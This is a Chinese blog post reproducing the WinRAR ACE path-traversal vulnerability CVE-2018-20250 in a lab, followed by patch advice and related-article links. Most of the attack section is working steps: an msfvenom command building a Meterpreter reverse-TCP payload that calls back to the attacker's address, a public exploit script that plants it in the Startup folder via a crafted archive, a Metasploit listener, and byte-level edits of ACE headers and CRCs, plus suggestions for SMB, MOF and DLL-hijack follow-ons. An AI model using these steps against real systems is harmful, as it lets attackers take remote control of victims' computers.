winrar远程代码执行漏洞复现(cve-2018-20250)

最新推荐文章于 2024-05-16 05:43:48 发布
最新推荐文章于 2024-05-16 05:43:48 发布
阅读量1.1k 收藏 6
点赞数 1
原文链接:https://blog.csdn.net/whatday/article/details/103918276
版权

使用metasploit验证漏洞

1.漏洞影响

WinRAR < 5.70 Beta 1

Bandizip< = 6.2.0.0

好压(2345压缩) < = 5.9.8.10907

360压缩< = 4.0.0.1170

2.环境搭建

攻击机:kali-2019                       ip:192.168.0.171

靶机:windows 7 +winrar5.5                        ip:192.168.0.169

3.漏洞复现

(1)下载WinRAR漏洞exp:https://github.com/WyAtu/CVE-2018-20250

(2)利用msfvenom生成恶意文件

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.171 lport=1234 -f exe >./test.exe

(3)编辑winrar漏洞exp文件

vi exp.py 

按i进行编辑

修改python3的运行命令

修改完后按esc退出编辑,然后按:,输入wq保存

(4)运行winrar漏洞exp

python3 exp.py

(5)把恶意winrar文件传到靶机

为了方便,利用python开启临时server

python -m SimpleHTTPServer 999

利用靶机浏览器访问,并下载test.rar

(6)kali启动msf,设置监听

msfconsole 

使用监听模块,并设置参数

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.171

set lport 1234

show options查看是否有遗漏

运行,exploit

(7)靶机解压恶意winrar文件

解压后会在自启动目录生成一个恶意文件hi.exe

目录为:C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\(administrator改为你当前用户名)

当电脑重启后就会自动运行该文件(这里为了方便就直接双击了),查看进程hi.exe已经运行

(8)返回kali,已经建立会话sessions

 

4.漏洞修复

更新winrar到最新版本

使用其它的解压软件,如7z

===========================================================

手工验证漏洞

Check Point的网络安全研究人员发现一个潜伏19年的漏洞——WinRAR代码执行漏洞。受影响的版本不止Winrar5.7版本之前,Bandzip、2345压缩、好压、totalcmd等软件也受影响,受害者使用受影响的压缩软件解压构造的恶意文件时便会触发漏洞。

受影响的版本

影响版本:

  • WinRAR < 5.70 Beta 1
  • Bandizip < = 6.2.0.0
  • 好压(2345压缩) < = 5.9.8.10907
  • 360压缩 < = 4.0.0.1170

腾讯研究员利用玄武实验室自研的“阿图因”系统,对已收录的全网 PC 软件进行了扫描,统计了 unacev2.dll 的使用情况,其版本分布情况如下图所示:

通过“阿图因”系统,腾讯研究员对使用了该共享库的软件进行反向溯源,目前扫描到了受影响的有 24 款国外软件,15 款国产软件。

多数受影响的软件都可以被归类为工具软件。其中至少有9款压缩软件,以及8款文件浏览器。还有其它许多软件将 unacev2.dll 作为 WinRAR 的一部分放在了自己的软件包中,作为解压模块使用。(使用unacev2.dll动态共享库的解压、文件管理类工具软件)

漏洞细节

漏洞主要是由Winrar用来解压ACE压缩包采用的动态链接库unacev2.dll这个dll引起的。unacev2.dll中处理filename时只校验了CRC,可以通过更改压缩包的CRC校验码来修改解压时候的filename来触发这个Path Traversal漏洞。但是Winrar本身检测了filename,有一些限制并且普通用户解压RAR文件时候不能将恶意的Payload解压到需要System权限的文件夹。当用户将文件下载到默认的C:\Users\Administrator\Downloads目录下时,通过构造

C:\C:C:../AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\test.exe

经过Winrar的CleanPath函数处理会变成

C:../AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\test.exe

其中C:会被转换成当前路径,如果用Winrar打开那么当前路径就是C:\Program Files\WinRAR,要是在文件夹中右键解压到xxx\那么当前路径就是压缩包所在的路径。

当用户在文件夹中直接右键解压到xx,那么恶意的payload解压地址就会变成

C:\Users\Administrator\Downloads../AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\test.exe

就是当前用户的启动项。这样一个利用完成了从一个Path Traversal到任意命令执行的过程。

漏洞复现

环境

  • win7 x64
  • winace v2.69
  • winrar 5.6.1 x64
  • 010Editor

复现

0x01 新建文件b404.txt

0x02 使用winace进行压缩,将b404.txt压缩为b404.ace

 

0x03 下载https://github.com/droe/acefile 中的ace脚本读取文件头信息:

python acefile.py --headers b404.ace

0x04 更改b404.ace的解压缩路径

 

第一处为0x590F(hdrcrc),第二处为0x003A(hdrsize),第三处为0x001B(filename的长度),以及最后一处为filename。

  • 0x3A的十进制是58
  • 0x1B的十进制是27

修改文件名为C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\b404.txt,文件名长度为69,即十六进制0x0045。在之前的0x001B上修改为0x0045:

 

0x05 修改hdr_size

因文件的绝对路径更改(即文件名变化),hdr_size发生变化,为100,十六进制为64h

 

原hdr_size为0x003A,因文件的绝对路径更改(即文件名变化),就更改hdrsize的长度0x003A0x0064:

 

0x06 修改CRC

现在直接运行acefile脚本检测修改后的ace文件,报错:

参考文章使用的是脚本报错中断时进行下断点,找出正确的CRC值。我直接使用https://github.com/WyAtu/CVE-2018-20250 中的acefile脚本进行正确的hdr_crc值查找,并更改:

更改成功之后,使用https://github.com/droe/acefile 中的acefile就可以检验成功:

然后使用WinRAR解压:

解压出来的路径是C:\Users\b404\Desktop\b404\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup,根本不符合C:\Users\b404\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup的目标地址,也就是目录穿越失败。即构造的文件名C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\b404.txt需要修改

0x07 重新构造文件名

重新构造文件名为C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b404.txt,将其写入到b404.ace中。

 

使用ace脚本检测ace头信息,得到正确的hdr_crc

此时需要修改的值为:

  • hdr_size:0x006F(即6Fh,十进制为111)
  • filename_size:0x0050(即50h,十进制为80)
  • right_hdr_crc:0x0EFA

 

在运行中shell:startup打开自启动目录C:\Users\b404\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup,没有b404.txt

 

解压到当前文件夹(解压到b404\也可以实现目录穿越):

C:\Users\b404\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup目录中就出现b404.txt

 

成功目录穿越。

扩展

若将b404.txt换成victim.exe,里面添加一些具有迷惑性的文档,ace扩展名更改为rar(WinRAR是通过文件的内容而不是扩展来检测格式的),一旦解压该程序,那就可以做很多事了。

研究人员还发现一个SMB攻击向量,可以连接到任意的IP地址,并在SMB服务器的任意路径创建文件和文件夹。比如:

C:\\\10.10.10.10\smb_folder_name\some_folder\some_file.ext => \\10.10.10.10\smb_folder_name\some_folder\some_file.ext

在拥有system权限下可以放入 c:/windows/system32/wbem/mof/nullevt.mof,直接获取目标主机的权限。

可以投放恶意dll文件进行dll劫持获取到目标主机的权限,或者覆盖用户主机上的文件等方式获取目标主机的权限

修补

  1. 升级到最新版本。比如WinRAR升级到5.70 Beta 1(http://win-rar.com/fileadmin/winrar-versions/winrar-x64-57b1.exe)
  2. 删除UNACEV2.dll文件

 

whatday
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
RAR漏洞 CVE-2018-20250
R4bbit
03-07 6104
前言: 最近 Check Point安全团队又发WinRAR的四个漏洞 ACE文件验证逻辑绕过漏洞 [CVE-2018-20250] ACE文件名逻辑验证绕过漏 [CVE-2018-20251] ACE/RAR文件越界写入漏洞 [CVE-2018-20252] LHA/LZH文件越界写入漏洞 [CVE-2018-20253] 网上流传最多的技术细节就是这个ACE文件验证逻辑绕过...
CVE-2018-2025(winrar远程代码执行漏洞
simple___sunny的博客
03-13 2352
漏洞背景: 2019 年 2 月 20 日 Check Point团队爆出了一个关于WinRAR存在19年的漏洞,用它来可以获得受害者计算机的控制。攻击者只需利用此漏洞构造恶意的压缩文件,当受害者使用WinRAR解压该恶意文件时便会触发漏洞WinRAR 代码执行相关的 CVE 编号如下: CVE-2018-20250, CVE-2018-20251, CVE-2018-2025...
CVE-2023-38831(Winrar RCE)漏洞与分析
m0_55994898的博客
12-10 1900
本文对Winrar RCE漏洞(CVE-2023-38831)进行以及原理分析,对攻击过程进行还原,让你更直观的感受此漏洞的攻击面。对于Reverse本人并不擅长,所以此篇文章参考了很多互联网公开的对此漏洞的研究分析报告,文末标注。
Apache Struts2远程代码执行漏洞(S2-001)
最新发布
2401_84545618的博客
05-16 880
​ 进行过响应处理后,在invokeaction()方法中会通过反射方式调用对应action里的execute()方法,这里获取的是LoginAction中的execute()方法,而后调用invoke()方法调用。当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。提交后,发执行了表达式,得出结果为2,并显示在对应的密码框中。
利用漏洞CVE-2018-20250模拟一次鱼叉式钓鱼邮件攻击
qq_43443410的博客
07-21 813
利用漏洞CVE-2018-20250模拟一次鱼叉式钓鱼邮件攻击1 概述2 实流程:2.1 具有恶意宏代码的docm文档编写2.2 利用CVE-2018-20250形成ACE压缩包2.3 邮件编写3 演示4 附录 1 概述   我们将向目标发送一封带有附件的钓鱼邮件,该附件是一个rar压缩包,该压缩包是利用CVE-2018-20250漏洞压缩而成的,包含有一些正常的具有迷惑性的txt文件等、一个具有恶意宏代码并启用宏的docm文档、灰鸽子服务端程序。   当目标收到邮件,将(被诱导)进行以下操作:     
winrar远程代码执行漏洞(cve-2018-20250)
good good study
07-13 5929
目录 漏洞介绍 漏洞影响 漏洞 漏洞 漏洞介绍 Check Point团队爆出了一个关于WinRAR存在19年的漏洞,用它来可以获得受害者计算机的控制。攻击者只需利用此漏洞构造恶意的压缩文件,当受害者使用WinRAR解压该恶意文件时便会触发漏洞。 该漏洞是由于 WinRAR 所使用的一个陈旧的动态链接库UNACEV2.dll所造成的,该动态链接库在 2006 年被编译,没有任何的基础保护机制(ASLR, DEP 等)。动态链接库的作用是处理 ACE 格式文件。而WinRAR解压AC
WinRAR CVE-2018-20250 漏洞
weixin_44283446的博客
12-07 698
WinRAR Exploit CVE-2018-20250 漏洞引言漏洞影响漏洞环境总结 引言 该漏洞是由于WinRAR 所使用的一个陈旧的动态链接库UNACEV2.dll所造成的,该动态链接库在2006 年被编译,没有任何的基础保护机制(ASLR,DEP 等)。在解压处理过程中存在一处目录穿越漏洞,允许解压过程写入文件至开机启动项,导致代码执行。 遇见这个漏洞研究,记录一下吧~ 漏洞影响 WinRAR < 5.70 Beta 1 Bandizip < = 6.2.0.0
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
11-23
Weblogic反序列化远程代码执行漏洞CVE-2018-2893)是Oracle WebLogic Server中一个严重安全问题,它允许攻击者通过发送恶意构造的序列化对象来执行任意代码,从而获得对服务器的完全控制。这个漏洞存在于WebLogic ...
远程执行代码漏洞(CVE-2018-0886)漏洞
08-21
**远程执行代码漏洞(CVE-2018-0886)详解及修** 远程执行代码漏洞(Remote Code Execution,RCE)是网络安全领域的一个重要话题,它指的是攻击者利用软件中的漏洞,在未经用户授权的情况下,能够在目标系统上执行...
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
Apache Log4j 是一个广泛使用的 Java 日志框架,它允许应用...总之,Apache Log4j 远程代码执行漏洞是一个重大安全事件,强调了在软件开发和运维过程中对安全性的重视。及时更新和维护软件库是防止此类漏洞影响的关键。
redis4.0x5.0x-远程命令漏洞利用exp.rar
07-09
redis4.0x5.0x-远程命令漏洞利用exp 2019年7月9日版,仅用来学习测试,不可用于非法用途,谢谢配合,实测可用
cve-2018-20250 WinRAR代码执行漏洞演示
02-28
WinRAR代码执行漏洞CVE-2018-20250详解及演示》 在信息安全领域,漏洞是无处不在的挑战,而WinRAR作为一款广泛应用的压缩软件,其安全问题备受关注。2018年,一个名为CVE-2018-20250的严重代码执行漏洞被曝光,它...
CVE-2018-20250】WinRAR漏洞浅谈
YNlanduiyun的博客
04-09 315
好友发来信息聊起WinRAR漏洞,其实这个漏洞的利用条件很有限,实际危害并不是很高,可是这个漏洞令人恐惧的是已经遗留了很多年,并且影响到全球5多亿的WinRAR用户,所以上班的时候,成了圈子里热议的话题。 好奇心驱使之下,开始了研究的过程。先看看原理。 根据Check Point研究人员的说法,该问题是因UNACEV2.dll代码库中的一个深藏已久的漏洞引起的,而且该代码库从200...
CVE-2022-0824 Webmin 远程代码执行漏洞
热爱学习,喜欢折腾!
10-11 2192
Webmin是功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。Webmin让您能够在远程使用支持HTTPS (SSL 上的 HTTP)协议的 Web 浏览器通过 Web界面管理您的主机。Webmin是一个功能强大且灵活的基于 Web 的服务器管理控制面板,适用于类Unix系统。Webmin允许用户配置操作系统内部,例如用户、磁盘配额、服务或配置文件,以及修改和控制开源应用程序,例如Apache HTTPServer、PHP或MySQL。
WinRAR 试用版曝漏洞:免费软件并不“免费“
smellycat000的专栏
10-21 429
聚焦源代码安全,网罗国内外最新资讯!作者:Igor Sak-Sakovskiy编译:代码卫士团队本文讨论的是位于 WinRAR 试用版中的一个漏洞,它对管理第三方软件具有重大影响。该漏洞...
metasploit 一款开源的渗透测试框架
djph26741的博客
08-19 1036
渗透神器漏洞利用框架metasploit from:https://zhuanlan.zhihu.com/p/30743401 metasploit是一款开源的渗透测试框架软件也是一个逐步发展与成熟的漏洞研究与渗透代码开发平台 metasploit体系如下: 基础库文件(Libraris):提供了核心框架和一些基础功能的支持 模块(Modules):实渗透测试功...
cve-2020-1938
热门推荐
梦之序章的博客
02-21 1万+
一、 Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,其安装后会默认开启ajp连接器,方便与其他web服务器通过ajp协议进行交互。属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。对于一个初学者来说,可以这样认为,当在一台机器上配置好Apache 服务器,可利用它响应HTML(标准通用标记语言下的一个应用)页面的访问请求。...
成功爬取-CVE-2018-15982漏洞【博客园】【1】
HWP
03-14 764
代码: import requests import bs4 from bs4 import BeautifulSoup import re ss = '' headers = { 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0...
PHP 远程代码执行漏洞(CVE-2022-31625)修办法
07-14
针对PHP远程代码执行漏洞(CVE-2022-31625),以下是一些修方法: 1. 更新到最新版本:确保你的PHP版本是最新的,因为漏洞通常会包含在更新中。请访问PHP官方网站或者使用包管理工具来获取最新版本。 2. 禁用危险函数:在php.ini配置文件中,禁用危险函数可以帮助防止远程代码执行。可以使用disable_functions指令来禁用一些敏感函数,如eval()、exec()、system()等。 3. 安全配置:检查你的PHP配置文件,确保安全设置已经启用。例如,禁用动态加载扩展、限制文件上传目录和大小、禁用远程文件包含等。 4. 输入验证和过滤:在你的应用程序中对用户输入进行严格的验证和过滤,以防止恶意代码注入。 5. 使用安全框架或库:使用安全框架或库来帮助防止远程代码执行漏洞。这些框架通常提供安全的默认配置和内置的安全功能。 6. 定期更新和监控:定期检查并更新你的应用程序和相关组件,以确保及时修已知漏洞。同时,监控应用程序的日志和网络流量,以便及时发异常行为。 请注意,这些方法只是一些常用的修措施,具体的修方法可能会因系统配置和应用程序的特定情况而有所不同。建议在修漏洞之前,先进行充分的测试和备份。此外,如果你不确定如何处理或无法解决该漏洞,请咨询安全专家或PHP开发人员的帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值